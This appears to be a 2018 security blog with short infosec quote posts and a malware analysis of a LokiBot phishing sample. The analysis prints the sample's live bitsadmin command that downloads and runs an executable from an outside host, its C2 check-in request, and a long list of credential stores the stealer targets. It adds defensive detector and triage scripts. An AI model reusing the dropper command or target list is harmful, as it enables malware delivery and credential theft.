Sunday, April 22, 2018

Infosec quotes - ski

“...
The control unit of a Ski lift gondola in Austria was exposed to the internet, allowing you to start/stop/reverse it and even configure the steel cable tension!
...”


https://twitter.com/svblxyz/status/986968644310716417?s=21 

Thursday, April 19, 2018

Infosec quotes - Evernote clipper

“... Evernote Clipper collects so much data from the webpages you visit...”


https://twitter.com/vysecurity/status/987013176331067392?s=21

lokibot sample

Found by @neonprimetime from 4/10/2018
Subject Priority :Invoice, PL & BL(Validate and confirm for final payment)
Attachment L5643290HS.doc
MD5 Checksum 33c06f02d43545be1b8baa567775402d
https://www.reverse.it/sample/729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf?environmentId=100
sending ip: 104.47.33.228 (outlook.com)

The Word doc is actually an RTF that runs bitsadmin to download the loki payload:

cmd.exe /c bitsadmin /transfer sY /priority foreground http://tpreiastephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe
MD5 Checksum 29BEE3FCCFE036A03281B7940718D38F
https://www.reverse.it/sample/a66f989e58ada2eff729ac2032ff71a159c521e7372373f4a1c1cf13f8ae2f0c?environmentId=100


it is lokibot (here's another example to compare: https://pastebin.com/pArSzS01)

-------------------------------
interesting network connections
-------------------------------
http posts to 216.222.194.136:80
POST /wp-content/along/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alongsidecoach.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E292D1AA
Content-Length: 159
Connection: close
..(.......ckav.ru.
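
A detector for this check-in, added here as an example (not part of the original post): it parses a raw HTTP request and reports which of the LokiBot beacon indicators captured above it matches. The indicator values come straight from the capture; the two sample requests and the scoring rule are constructed for the example.

```python
"""Flag HTTP POSTs that match the LokiBot check-in captured above.

Added example, not from the original post: parses a raw HTTP/1.x request and
reports which of the beacon indicators from the capture it matches. Indicator
values are the ones shown in the capture; the sample requests and the
scoring rule below are constructed for this example.
"""
from __future__ import annotations

# Indicator values taken from the captured POST above.
LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
LOKI_HEADER = "content-key"        # custom header LokiBot adds to every beacon
LOKI_PATH_SUFFIX = "fre.php"       # C2 gate script name seen in the capture
LOKI_BODY_MARKER = b"ckav.ru"      # fixed string carried in the beacon body


def parse_request(raw: bytes) -> tuple[str, str, dict[str, str], bytes]:
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no end-of-headers marker")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def lokibot_indicators(raw: bytes) -> list[str]:
    """Return the names of the LokiBot beacon indicators present in the request."""
    method, path, headers, body = parse_request(raw)
    hits: list[str] = []
    if method == "POST" and path.endswith(LOKI_PATH_SUFFIX):
        hits.append("post-to-fre.php")
    if headers.get("user-agent") == LOKI_USER_AGENT:
        hits.append("charon-inferno-user-agent")
    if LOKI_HEADER in headers:
        hits.append("content-key-header")
    if (headers.get("content-type") == "application/octet-stream"
            and headers.get("content-encoding") == "binary"):
        hits.append("binary-octet-stream-body")
    if LOKI_BODY_MARKER in body:
        hits.append("ckav.ru-body-marker")
    return hits


def is_lokibot_beacon(raw: bytes) -> bool:
    """Verdict rule (constructed): the user-agent alone is decisive; otherwise
    require two of the weaker indicators so ordinary binary uploads don't fire."""
    hits = lokibot_indicators(raw)
    return "charon-inferno-user-agent" in hits or len(hits) >= 2


# Constructed replica of the captured POST (body shortened to a placeholder
# that still carries the ckav.ru marker).
LOKI_POST = (
    b"POST /wp-content/along/five/fre.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: alongsidecoach.com\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: E292D1AA\r\n"
    b"Content-Length: 16\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x12\x00(\x00\x07\x00\x00\x00ckav.ru\x00"
)

# Constructed benign upload for comparison.
BENIGN_POST = (
    b"POST /api/upload HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: curl/7.58.0\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b'{"ok": true}'
)

if __name__ == "__main__":
    for name, req in (("capture", LOKI_POST), ("benign", BENIGN_POST)):
        print(name, is_lokibot_beacon(req), lokibot_indicators(req))
```

The user-agent is the strongest single signal because it is hard-coded in the sample, but the Content-Key header and the octet-stream/binary pairing are worth logging on their own: they survive a C2 path change, which the fre.php check does not.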

--------------------------------
interesting in-memory strings
--------------------------------
0x4a0074 (55): http://alongsidecoach.com/wp-content/along/five/fre.php
0x2fd82e6 (26): Comodo\Dragon
0x2fd8302 (44): MapleStudio\ChromePlus
0x2fd8332 (26): Google\Chrome
0x2fd8396 (26): Titan Browser
0x2fd83be (40): Yandex\YandexBrowser
0x2fd83ea (40): Epic Privacy Browser
0x2fd8416 (28): CocCoc\Browser
0x2fd8446 (30): Comodo\Chromodo
0x2fd847a (26): Coowon\Coowon
0x2fd8496 (30): Mustang Browser
0x2fd84b6 (36): 360Browser\Browser
0x2fd84de (40): CatalinaGroup\Citrio
0x2fd850a (34): Google\Chrome SxS
0x2fd854e (44): \Opera\Opera Next\data
0x2fd857e (56): \Opera Software\Opera Stable
0x2fd85ba (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
0x2fd8622 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
0x2fd868e (24): vaultcli.dll
0x2fd86aa (19): VaultEnumerateItems
0x2fd86be (20): VaultEnumerateVaults
0x2fd86e2 (12): VaultGetItem
0x2fd86f2 (14): VaultOpenVault
0x2fd8702 (15): VaultCloseVault
0x2fd8712 (116): Software\Microsoft\Internet Explorer\IntelliForms\Storage2
0x2fd87b2 (92): Software\Microsoft\Internet Explorer\TypedURLs
0x2fd881a (84): SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
0x2fd888e (17): encryptedUsername
0x2fd88a2 (17): encryptedPassword
0x2fd88b6 (28): %s\logins.json
0x2fd88d6 (22): %s\prefs.js
0x2fd88ee (34): %s\signons.sqlite
0x2fd8912 (22): signons.txt
0x2fd892a (24): signons2.txt
0x2fd8946 (24): signons3.txt
0x2fd8962 (62): %s\Mozilla\Firefox\profiles.ini
0x2fd89a2 (60): %s\Mozilla\Firefox\Profiles\%s
0x2fd89e2 (66): %s\Mozilla\SeaMonkey\profiles.ini
0x2fd8a2a (64): %s\Mozilla\SeaMonkey\Profiles\%s
0x2fd8a6e (58): %s\Flock\Browser\profiles.ini
0x2fd8aaa (56): %s\Flock\Browser\Profiles\%s
0x2fd8ae6 (54): %s\Thunderbird\profiles.ini
0x2fd8b1e (52): %s\Thunderbird\Profiles\%s
0x2fd8b56 (48): %s\K-Meleon\profiles.ini
0x2fd8b8a (28): %s\K-Meleon\%s
0x2fd8baa (64): %s\Comodo\IceDragon\profiles.ini
0x2fd8bf2 (62): %s\Comodo\IceDragon\Profiles\%s
0x2fd8c32 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
0x2fd8c92 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
0x2fd8cee (46): %s\Postbox\profiles.ini
0x2fd8d1e (44): %s\Postbox\Profiles\%s
0x2fd8d52 (74): %s\8pecxstudios\Cyberfox\profiles.ini
0x2fd8da2 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
0x2fd8df2 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
0x2fd8e52 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
0x2fd8eb2 (50): %s\FossaMail\profiles.ini
0x2fd8ee6 (48): %s\FossaMail\Profiles\%s
0x2fd8f1a (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
0x2fd8ff6 (22): %s\nss3.dll
0x2fd901a (12): NSS_Shutdown
0x2fd902a (23): PK11_GetInternalKeySlot
0x2fd9042 (13): PK11_FreeSlot
0x2fd9052 (17): PK11_Authenticate
0x2fd9066 (15): PK11SDR_Decrypt
0x2fd9076 (22): PK11_CheckUserPassword
0x2fd908e (16): SECITEM_FreeItem
0x2fd90a2 (22): sqlite3.dll
0x2fd90ba (28): mozsqlite3.dll
0x2fd90ee (16): sqlite3_finalize
0x2fd9102 (12): sqlite3_step
0x2fd9112 (13): sqlite3_close
0x2fd9122 (19): sqlite3_column_text
0x2fd9136 (14): sqlite3_open16
0x2fd9146 (18): sqlite3_prepare_v2
0x2fd915a (15): sqlite3_prepare
0x2fd916a (28): CurrentVersion
0x2fd918a (64): SOFTWARE\Mozilla\Mozilla Firefox
0x2fd91d6 (20): %s\%s\Main
0x2fd91ee (34): Install Directory
0x2fd922a (72): SOFTWARE\Mozilla\Mozilla Thunderbird
0x2fd9276 (52): SOFTWARE\Mozilla\FossaMail
0x2fd92ae (48): SOFTWARE\Postbox\Postbox
0x2fd92e2 (44): SOFTWARE\Mozilla\Flock
0x2fd9312 (40): SOFTWARE\Flock\Flock
0x2fd934a (28): %ProgramW6432%
0x2fd936a (42): %s\NETGATE\Black Hawk
0x2fd9396 (52): SOFTWARE\Mozilla\Pale Moon
0x2fd93d2 (140): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
0x2fd9462 (34): SOFTWARE\K-Meleon
0x2fd949a (72): SOFTWARE\ComodoGroup\IceDragon\Setup
0x2fd94fa (64): SOFTWARE\8pecxstudios\Cyberfox86
0x2fd953e (60): SOFTWARE\8pecxstudios\Cyberfox
0x2fd957e (60): SOFTWARE\mozilla.org\SeaMonkey
0x2fd95be (38): %s\Mozilla\Profiles
0x2fd95ee (52): SOFTWARE\Mozilla\SeaMonkey
0x2fd9626 (50): SOFTWARE\Mozilla\Waterfox
0x2fd9672 (22): firefox.exe
0x2fd9696 (24): kernel32.dll
0x2fd96b2 (11): CloseHandle
0x2fd96be (11): CreateFileW
0x2fd96d6 (11): ExitProcess
0x2fd96e2 (22): Crypt32.dll
0x2fd96fa (20): CryptStringToBinaryA
0x2fd9712 (22): Shlwapi.dll
0x2fd9732 (14): GetProcAddress
0x2fd9742 (12): LoadLibraryW
0x2fd977a (39): X!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb
0x2fd97a2 (42): form_password_control
0x2fd97ce (42): form_username_control
0x2fd97fa (108): Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
0x2fd986a (84): %s\QupZilla\profiles\default\browsedata.db
0x2fd98ee (20): InstallDir
0x2fd990a (72): SOFTWARE\Apple Computer, Inc.\Safari
0x2fd995a (88): %s\Apple Computer\Preferences\keychain.plist
0x2fd99ba (78): %s\Apple Application Support\plutil.exe
0x2fd9a16 (54): -convert xml1 -s -o %s "%s"
0x2fd9a4e (56): %s\Data\AccCfg\Accounts.tdat
0x2fd9a8a (20): %s\Storage
0x2fd9aa2 (24): Account.rec0
0x2fd9abe (30): %s\Foxmail\mail
0x2fd9aea (26): %SYSTEMDRIVE%
0x2fd9b1a (24): EmailAddress
0x2fd9b36 (20): Technology
0x2fd9b72 (20): PopAccount
0x2fd9b8a (22): PopPassword
0x2fd9ba2 (20): SmtpServer
0x2fd9bce (22): SmtpAccount
0x2fd9be6 (24): SmtpPassword
0x2fd9c02 (62): Software\IncrediMail\Identities
0x2fd9c66 (20): POP3Server
0x2fd9c9e (36): SMTP Email Address
0x2fd9cc6 (22): SMTP Server
0x2fd9cde (28): SMTP User Name
0x2fd9d12 (22): POP3 Server
0x2fd9d2a (28): POP3 User Name
0x2fd9d5e (36): NNTP Email Address
0x2fd9d86 (28): NNTP User Name
0x2fd9da6 (22): NNTP Server
0x2fd9dbe (22): IMAP Server
0x2fd9dd6 (28): IMAP User Name
0x2fd9e1e (30): HTTP Server URL
0x2fd9e3e (36): HTTPMail User Name
0x2fd9e66 (30): HTTPMail Server
0x2fd9ec2 (28): POP3 Password2
0x2fd9ee2 (28): IMAP Password2
0x2fd9f02 (28): NNTP Password2
0x2fd9f22 (36): HTTPMail Password2
0x2fd9f4a (28): SMTP Password2
0x2fd9f6a (26): POP3 Password
0x2fd9f86 (26): IMAP Password
0x2fd9fa2 (26): NNTP Password
0x2fd9fbe (26): HTTP Password
0x2fd9fda (26): SMTP Password
0x2fd9ffa (178): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
0x2fda0b2 (110): Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
0x2fda122 (110): Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
0x2fda192 (30): %s\32BitFtp.TMP
0x2fda1b2 (30): %s\32BitFtp.ini
0x2fda1d2 (54): %s\Estsoft\ALFTP\ESTdb2.dat
0x2fda20a (22): %s\site.xml
0x2fda222 (46): %s\BitKinex\bitkinex.ds
0x2fda26e (30): LastUsedProfile
0x2fda28e (56): Software\Bitvise\BvSshClient
0x2fda2ca (40): %s\BlazeFtp\site.dat
0x2fda2fa (72): Software\FlashPeak\BlazeFtp\Settings
0x2fda346 (24): LastPassword
0x2fda376 (22): LastAddress
0x2fda3da (88): Software\NCH Software\ClassicFTP\FTPAccounts
0x2fda456 (24): %s\Cyberduck
0x2fda472 (22): user.config
0x2fda48a (30): %s\iterate_GmbH
0x2fda4aa (30): %s\EasyFTP\data
0x2fda4f2 (26): %s\ExpanDrive
0x2fda50e (26): *favorites.js
0x2fda56a (60): Software\Far\Plugins\FTP\Hosts
0x2fda5aa (62): Software\Far2\Plugins\FTP\Hosts
0x2fda5ea (148): %s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
0x2fda682 (52): %s\FileZilla\Filezilla.xml
0x2fda6ba (52): %s\FileZilla\filezilla.xml
0x2fda6f2 (60): %s\FileZilla\recentservers.xml
0x2fda732 (56): %s\FileZilla\sitemanager.xml
0x2fda76e (22): %s\FlashFXP
0x2fda786 (20): *Sites.dat
0x2fda79e (20): *quick.dat
0x2fda7ca (22): FtpUserName
0x2fda7e2 (22): FtpPassword
0x2fda7fa (24): _FtpPassword
0x2fda81a (72): Software\NCH Software\Fling\Accounts
0x2fda86a (78): %s\FreshWebmaster\FreshFTP\FtpSites.SMF
0x2fda8ba (46): %s\FTPBox\profiles.conf
0x2fda8ea (64): %s\FTPGetter\Profile\servers.xml
0x2fda92e (48): %s\FTPGetter\servers.xml
0x2fda962 (50): %s\FTPInfo\ServerList.xml
0x2fda996 (50): %s\FTPInfo\ServerList.cfg
0x2fda9ca (56): %s\FTP Navigator\Ftplist.txt
0x2fdaa06 (40): %s\FTP Now\sites.xml
0x2fdaa32 (48): %s\FTPShell\ftpshell.fsi
0x2fdaa6a (64): %s\.config\fullsync\profiles.xml
0x2fdaaae (44): %s\DeluxeFTP\sites.xml
0x2fdaae2 (66): %s\GoFTP\settings\Connections.txt
0x2fdab5a (36): %s\%s%i\encPwd.jsd
0x2fdab82 (78): %s\%s%i\data\settings\sshProfiles-j.jsd
0x2fdabd2 (78): %s\%s%i\data\settings\ftpProfiles-j.jsd
0x2fdac46 (60): Software\LinasFTP\Site Manager
0x2fdac86 (52): %s\oZone3D\MyFTP\myftp.ini
0x2fdacbe (46): %s\NetDrive\NDSites.ini
0x2fdacee (46): %s\NetDrive2\drives.dat
0x2fdad22 (64): %s\Fastream NETFile\My FTP Links
0x2fdad6a (66): %s\NexusFile\userdata\ftpsite.ini
0x2fdadae (48): %s\NexusFile\ftpsite.ini
0x2fdade2 (64): %s\INSoftware\NovaFTP\NovaFTP.db
0x2fdae2a (90): %s\Notepad++\plugins\config\NppFTP\NppFTP.xml
0x2fdae8a (78): %s\Odin Secure FTP Expert\QFDefault.QFQ
0x2fdaeda (76): %s\Odin Secure FTP Expert\SiteInfo.QFP
0x2fdaf2a (26): PublicKeyFile
0x2fdaf46 (24): TerminalType
0x2fdaf62 (20): PortNumber
0x2fdaf7a (64): Software\9bis.com\KiTTY\Sessions
0x2fdafc2 (70): Software\SimonTatham\PuTTY\Sessions
0x2fdb026 (20): lsasrv.dll
0x2fdb03e (22): LsaICryptUnprotectData
0x2fdb072 (48): %s\Microsoft\Credentials
0x2fdb0a6 (22): Config Path
0x2fdb0be (50): Software\VanDyke\SecureFX
0x2fdb0f2 (22): %s\Sessions
0x2fdb13a (30): %s\SftpNetDrive
0x2fdb16a (84): %s\Sherrod Computers\sherrod FTP\favorites
0x2fdb1c2 (52): #document.favoriteManager*
0x2fdb1fa (22): %s\SmartFTP
0x2fdb222 (44): %s\Staff-FTP\sites.ini
0x2fdb252 (44): %s\Steed\bookmarks.txt
0x2fdb282 (26): %s\SuperPutty
0x2fdb30a (20): {.:CRED:.}
0x2fdb356 (24): %s\Syncovery
0x2fdb372 (26): Syncovery.ini
0x2fdb38e (28): %s\wcx_ftp.ini
0x2fdb3ae (44): %s\GHISLER\wcx_ftp.ini
0x2fdb3de (20): FtpIniName
0x2fdb3fa (64): Software\Ghisler\Total Commander
0x2fdb43e (42): %s\UltraFXP\sites.xml
0x2fdb46a (60): %s\WinFtp Client\Favorites.dat
0x2fdb4aa (20): FSProtocol
0x2fdb4c2 (46): Software\Martin Prikryl
0x2fdb4f2 (40): %s\WS_FTP\WS_FTP.INI
0x2fdb51e (26): %s\WS_FTP.INI
0x2fdb53a (22): %s\Ipswitch
0x2fdb552 (20): ws_ftp.ini
0x2fdb56a (52): %s\NetSarang\Xftp\Sessions
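
To turn a dump like this into a one-screen capability summary, here is an added example (my own triage script, not part of the original post): it parses the "0xADDR (len): string" lines and buckets each string by the credential store it points at. DUMP is a constructed subset of the strings listed above; the category regexes are heuristics written for this example, not a published signature.

```python
"""Triage a strings dump like the one above into credential-theft capabilities.

Added example, not part of the original post: parses lines in the
"0xADDR (len): string" layout and buckets each string by the credential
store it points at, so a 250-line dump reads as a capability summary.
DUMP is a constructed subset of the strings listed above; the category
regexes are heuristics written for this example, not a published signature.
"""
from __future__ import annotations

import re
from collections import defaultdict

LINE_RE = re.compile(r"^0x[0-9a-f]+ \(\d+\): (.*)$")

# Ordered (category, pattern) rules; the first match wins, so the more
# specific stores (mail, SSH) come before the broad browser/FTP patterns.
RULES = [
    ("c2-url",            re.compile(r"^https?://", re.I)),
    ("windows-vault-api", re.compile(r"^Vault(Enumerate|Get|Open|Close)|vaultcli\.dll", re.I)),
    ("dpapi",             re.compile(r"LsaICryptUnprotectData|\\Microsoft\\Credentials", re.I)),
    ("firefox-nss",       re.compile(r"^(PK11|NSS_|SECITEM_)|nss3\.dll|moz_logins|signons|logins\.json", re.I)),
    ("mail-client",       re.compile(r"Outlook|Thunderbird|Foxmail|IncrediMail|Postbox|FossaMail|"
                                     r"(POP3?|SMTP|IMAP|NNTP|HTTPMail|HTTP)\s?(Server|User|Email|Password|Account)", re.I)),
    ("ssh-client",        re.compile(r"PuTTY|KiTTY|Bitvise|SuperPutty|sshProfiles", re.I)),
    ("ftp-client",        re.compile(r"FTP|FileZilla|FlashFXP|Cyberduck|BitKinex|ExpanDrive|NetDrive|"
                                     r"Total Commander|wcx_ftp|Syncovery|Steed|SecureFX", re.I)),
    ("browser-profile",   re.compile(r"profiles\.ini|Profiles\\|Chrome|Chromium|Opera|Browser|Safari|QupZilla|"
                                     r"Lunascape|IntelliForms|TypedURLs|keychain|Firefox|SeaMonkey|Waterfox|"
                                     r"Pale Moon|Cyberfox|IceDragon|K-Meleon|Flock", re.I)),
]


def classify_strings(dump: str) -> dict[str, list[str]]:
    """Bucket every dump line by the first rule its string matches."""
    buckets: dict[str, list[str]] = defaultdict(list)
    for line in dump.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank lines and anything that isn't a strings entry
        s = m.group(1)
        for category, rx in RULES:
            if rx.search(s):
                buckets[category].append(s)
                break
        else:
            buckets["other"].append(s)
    return dict(buckets)


def capability_summary(dump: str) -> dict[str, int]:
    """Count of strings per category: the short answer to 'what does it steal?'"""
    return {k: len(v) for k, v in classify_strings(dump).items()}


# Constructed subset of the in-memory strings listed above.
DUMP = r"""
0x4a0074 (55): http://alongsidecoach.com/wp-content/along/five/fre.php
0x2fd8332 (26): Google\Chrome
0x2fd868e (24): vaultcli.dll
0x2fd86aa (19): VaultEnumerateItems
0x2fd881a (84): SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
0x2fd8962 (62): %s\Mozilla\Firefox\profiles.ini
0x2fd9066 (15): PK11SDR_Decrypt
0x2fd9696 (24): kernel32.dll
0x2fd977a (39): X!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb
0x2fd9abe (30): %s\Foxmail\mail
0x2fd9b8a (22): PopPassword
0x2fda0b2 (110): Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
0x2fda732 (56): %s\FileZilla\sitemanager.xml
0x2fdafc2 (70): Software\SimonTatham\PuTTY\Sessions
0x2fdb03e (22): LsaICryptUnprotectData
"""

if __name__ == "__main__":
    for category, count in sorted(capability_summary(DUMP).items(), key=lambda kv: -kv[1]):
        print(f"{category:18} {count}")
```

Whatever lands in "other" is the part worth reading by hand: the constant-looking string and the plain DLL names in the dump above are exactly the kind of leftovers that distinguish one build from another.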

rtfdump cut interesting section

rtfdump.py bla.rtf

Scroll through the output and find the largest section that is closest to the bottom.

e.g. id 179 was the one I found.

then run

rtfdump.py -s 179 -H bla.rtf

and you get a hex dump with the readable ASCII alongside it.
If you scroll, somewhere buried in there is the content you want.

e.g. it might start at 0x970 and end at 0xA10.

then run

rtfdump.py --cut 0x970:0xA10 -s 179 -H -d bla.rtf

and it'll display the plain ASCII text of the payload you wanted to see!

sweet
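
The same two steps done by hand in Python, as an added example (not part of the original post and not rtfdump's own code): find the largest hex-encoded \objdata blob in an RTF, decode it, then cut a byte range out of it. SAMPLE_RTF is a constructed document whose embedded object wraps a harmless made-up command string behind a few junk header bytes; nothing in it is a real OLE structure.

```python
"""Pull the hex-encoded payload out of an RTF object by hand.

Added example, not from the original post and not rtfdump's own code: a
minimal re-implementation of the two steps above. It finds every hex-encoded
\\objdata blob in the RTF, keeps the largest, decodes it, and cuts a byte
range out of it. SAMPLE_RTF is a constructed document whose embedded object
wraps a harmless made-up command string behind a few junk header bytes.
"""
from __future__ import annotations

import re

# \objdata is followed by hex digits that may be broken across lines.
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")
NON_HEX_RE = re.compile(r"[^0-9a-fA-F]")


def objdata_blobs(rtf: str) -> list[bytes]:
    """Decode every \\objdata blob, largest first (the one you usually want)."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        digits = NON_HEX_RE.sub("", m.group(1))
        if len(digits) % 2:
            digits = digits[:-1]  # tolerate a dangling nibble instead of failing
        blobs.append(bytes.fromhex(digits))
    return sorted(blobs, key=len, reverse=True)


def printable_runs(blob: bytes, min_len: int = 8) -> list[tuple[int, str]]:
    """Offsets of printable ASCII runs, to pick the START:END values to cut."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [(m.start(), m.group().decode("ascii")) for m in re.finditer(pattern, blob)]


def cut(blob: bytes, start: int, end: int) -> bytes:
    """Same idea as --cut START:END, applied to the already decoded bytes."""
    return blob[start:end]


# --- constructed sample document -------------------------------------------
PAYLOAD_CMD = b"cmd.exe /c echo constructed-example-payload"   # harmless, made up
JUNK_HEADER = b"\x01\x05\x00\x00\x02\x00\x00\x00"               # filler, not a real OLE header
_OBJECT = JUNK_HEADER + PAYLOAD_CMD + b"\x00" * 4
_HEX = _OBJECT.hex()
_HEX = _HEX[:20] + "\n" + _HEX[20:]   # RTF writers wrap hex lines; make sure we cope
SAMPLE_RTF = (
    "{\\rtf1"
    "{\\object\\objemb{\\*\\objdata 4142}}"            # small decoy object
    "{\\object\\objemb{\\*\\objdata " + _HEX + "}}"    # the one we care about
    "}"
)

if __name__ == "__main__":
    biggest = objdata_blobs(SAMPLE_RTF)[0]
    for offset, text in printable_runs(biggest):
        print(f"0x{offset:X}: {text}")
```

Picking the largest blob is the same heuristic as picking the biggest section in rtfdump's listing; the printable-run scan replaces the manual scrolling for the 0x970:0xA10 style offsets.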

Infosec quotes - internet garbage

Good reminder why privileged accounts should have no internet access. Even basic browsing activities can lead to bad things.

“... You won't believe how much garbage normal web browsing brings into your network...”


https://twitter.com/securethisnow/status/986831856682262528?s=21

Infosec quotes - first step logs

Access to logs is important for your security team to protect an org: firewall, server, workstation, app logs, etc.

“... Can't hunt or detect what you can't see. Visibility is definitely a key first step ...”


https://twitter.com/vysecurity/status/986857519439142913?s=21

Infosec quotes - webex meeting RCE

Cisco Webex In-meeting Remote Code Execution on attendees.

“... submit a malicious .swf to a room full of attendees via the file sharing tool, then execute the code on all of the targeted machines...”


https://www.theregister.co.uk/2018/04/19/cisco_patch_webex/